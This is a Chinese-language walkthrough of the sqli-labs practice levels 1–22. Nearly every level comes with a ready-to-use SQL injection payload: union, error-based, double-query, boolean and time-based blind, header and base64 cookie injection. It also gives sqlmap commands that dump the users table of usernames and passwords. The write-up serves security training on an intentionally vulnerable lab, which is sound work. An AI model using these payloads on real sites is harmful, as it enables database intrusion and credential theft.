文章目录
- sqli-labs基础关卡(1-22)
- less-1 GET - Error based - Single quotes - String
- less-2 GET - Error based - Intiger based
- less-3 GET - Error based - Single quotes with twist -string
- less-4 GET - Error based - Double Quotes - String
- less-5 GET - Double Injection - Single Quotes -String
- less-6 GET - Double Injection - Double Quotes -String
- less-8 GET - Blind - Boolian Based - Single Quotes
- less-9 GET - Blind - Time based. - Single Quotes
- less-10 GET - Blind - Time based - double quotes
- less-11 POST - Error Based - Single quotes- String
- less-12 POST - Error Based - Double quotes- String
- less-13 POST - Double Injection - Single quotes-String -with -twist
- less-14 POST - Double Injection - Single quotes-String -with -twist
- less-15 POST - Blind- Boolian/time Based - Single quotes
- less-16 POST - Blind- Boolian/Time Based - Double quotes
- less-17 POST - Update Query- Error Based - String
- less-18 POST - Header Injection - Uagent field -Error based
- less-19 POST - Header Injection - Referer field -Error based
- less-20 POST - Cookie injections - Uagent field -Error based
- less-22 Cookie injection- base64 encoded-single auotes and parenthesis
- less-22 Cookie Injection - base64 encoded - double quotes
sqli-labs基础关卡(1-22)
注入思路
- 有回显
- 联合查询
- 无回显
- 有报错
- 报错注入
- 无报错
- 时间盲注
- 布尔盲注
less-1 GET - Error based - Single quotes - String
方法一:union联合查询注入
输入单引号,页面报错,根据报错信息可以判断为单引号闭合。话不多说,直接爆库
爆库名
?id=-1' union select 1,database(),3--+
爆表
?id=-1' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=database()),3--+
爆字段
?id=-1' union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name="users"),3--+
爆数据
?id=-1' union select 1,(select group_concat(username,0x3a,password)from users),3--+
方法二:报错注入
extractvalue()是对XML文档进行查询的函数
语法:extractvalue(目标XML文档,XML路径)。第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容。
有一点需要注意,extractvalue()能查询字符串的最大长度为32,就是说如果我们想要的结果超过32,就需要用substring()函数截取,一次查看32位
updatexml()函数与extractvalue()类似,是更新xml文档的函数。
语法:updatexml(目标xml文档,xml路径,更新的内容)
注意:updatexml同样能查询到字符串的最大长度同样也是32
爆库名
?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
爆表
?id=1' and extractvalue(1,concat(0x7e,(substring((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,32)),0x7e))--+
爆字段
?id=1' and extractvalue(1,concat(0x7e,(substring((select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name="users"),1,32)),0x7e))--+
爆数据
?id=1' and extractvalue(1,concat(0x7e,(substring((select group_concat(username,0x3a,password)from users),1,32)),0x7e))--+ 依次爆出32位长度的数据即可
updatexml与extractvalue类似,在第二个参数写查询语句
less-2 GET - Error based - Intiger based
第二关id为整数,别的和第一关一样
less-3 GET - Error based - Single quotes with twist -string
单引号加括号闭合
less-4 GET - Error based - Double Quotes - String
双引号加括号闭合
less-5 GET - Double Injection - Single Quotes -String
输入?id=1 显示You are in… 加上单引号发现报错,直接上报错函数
爆库
?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
爆表
?id=-1' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=database()),3--+
爆字段
?id=1' and extractvalue(1,concat(0x7e,(substring((select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name="users"),1,32)),0x7e))--+
爆数据
?id=1' and extractvalue(1,concat(0x7e,(substring((select group_concat(username,0x3a,password)from users),1,32)),0x7e))--+
less-6 GET - Double Injection - Double Quotes -String
双引号闭合
less-8 GET - Blind - Boolian Based - Single Quotes
根据名字判断是布尔盲注
PS:盲注强烈建议使用脚本或者sqlmap,不然会累死!!!
先猜数据库的长度
?id=1' and length(database())=1--+
?id=1' and length(database())=2--+
?id=1' and length(database())=3--+
?id=1' and length(database())=4--+
?id=1' and length(database())=5--+
?id=1' and length(database())=6--+
?id=1' and length(database())=7--+
?id=1' and length(database())=8--+
在第八次页面正常显示,说明数据库长度为8
得到数据库长度之后,开始爆库名
substring(要截取的字符串,start,step)
采用二分法会极大加快效率
?id=1' and substring(database(),1,1)>"m"--+
页面正常,说明数据库的第一个字母>m,接着采用二分法,最终得到第一个字母为‘s’
爆表名
?id=1' and substring((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1)="e"--+
爆列名
?id=1' and substring((select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name="users"),1,1)="i"--+
爆数据
?id=1' and substring((select group_concat(username) from users),1,1)='d'--+
less-9 GET - Blind - Time based. - Single Quotes
不管输入什么发现页面都是一个样子,采用时间盲注
库长
?id=1' and if(length(database())=8,sleep(3),0)--+
less-10 GET - Blind - Time based - double quotes
双引号闭合,别的和第九关一样
less-11 POST - Error Based - Single quotes- String
POST型注入,需要借助burpsuit抓包
less-12 POST - Error Based - Double quotes- String
双引号加括号闭合
less-13 POST - Double Injection - Single quotes-String -with -twist
单引号加括号闭合
less-14 POST - Double Injection - Single quotes-String -with -twist
双引号闭合
less-15 POST - Blind- Boolian/time Based - Single quotes
POST盲注
碰见盲注直接sqlmap
sqlmap 常用命令
--current-db #当前数据库
--current-user #当前用户
-dbs #列出所有数据库
-D #指定数据库
--tables #列出所有表
-T #指定表
--columns #列出所有列
--dump #列出数据库表项
--tamper #加载脚本
爆库
sqlmap -r /root/less-15.txt --batch --current-db # --current-db 当前数据库
爆表
sqlmap -r /root/less-15.txt --batch -D security --tables --thread 10
爆数据
sqlmap -r /root/less-15.txt --batch -D security -T users --dump --thread 10
less-16 POST - Blind- Boolian/Time Based - Double quotes
POST盲注,双引号加括号闭合,其他和15关一样
less-17 POST - Update Query- Error Based - String
查看源码发现对uname进行了过滤,只能从password字段注入
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
get_magic_quotes_gpc — 获取当前 magic_quotes_gpc 的配置选项设置
当 magic_quotes_gpc 打开时,所有的 ‘ (单引号), ” (双引号), (反斜线) and 空字符会自动转为含有反斜线的溢出字符
stripslashes()返回一个去除转义反斜线后的字符串(\'
转换为 '
等等)。双反斜线(\\
)被转换为单个反斜线(\
)
mysql_real_escape_string — 转义 SQL 语句中使用的字符串中的特殊字符,并考虑到连接的当前字符集
ctype_digit()判断是不是数字,是数字就返回true,否则返回false
先判断是否为空,再判断全局魔术开关是否打开,如果打开,走进第二个if,然后用stripslashes()函数去除转移字符。在判断是不是数字,如果不是,走进第三个if,再用mysql_real_escape_string()转义特殊字符,这些特殊字符是:\x00,\n,\r,\,’,"和\x1a.
17关主要考察group by报错注入
爆数据payload
1' and (select 1 from (select count(*),concat((select concat(username,0x3a,password) from security.users limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x) a)#
less-18 POST - Header Injection - Uagent field -Error based
uagent注入
1' and extractvalue(1,concat(0x7e,(substring((select group_concat(username,0x3a,password)from users),1,32)),0x7e)) and '1'='1
less-19 POST - Header Injection - Referer field -Error based
refere注入,方法和18关一样
less-20 POST - Cookie injections - Uagent field -Error based
cookie注入,方法和18关一样
less-22 Cookie injection- base64 encoded-single auotes and parenthesis
登录成功后返回b64编码的cookie,猜测是cookie注入(b64编码)
对YWRtaW4= b64解码后是admin,验证了是cookie编码注入
编码前payload
admin') and extractvalue(1,concat(0x7e,(substring((select group_concat(username,0x3a,password)from users),1,32)),0x7e))--+
base64编码脚本,网上也有好多现成工具可以使用
import base64
payload = "admin') and extractvalue(1,concat(0x7e,(substring((select group_concat" \
"(username,0x3a,password)from users),1,32)),0x7e))#"
a = base64.b64encode(payload.encode('utf-8')).decode("utf-8")
print(a)
编码后的payload
YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHN1YnN0cmluZygoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSwweDNhLHBhc3N3b3JkKWZyb20gdXNlcnMpLDEsMzIpKSwweDdlKSkj
less-22 Cookie Injection - base64 encoded - double quotes
cookie b64注入,双引号闭合,方法和21关一样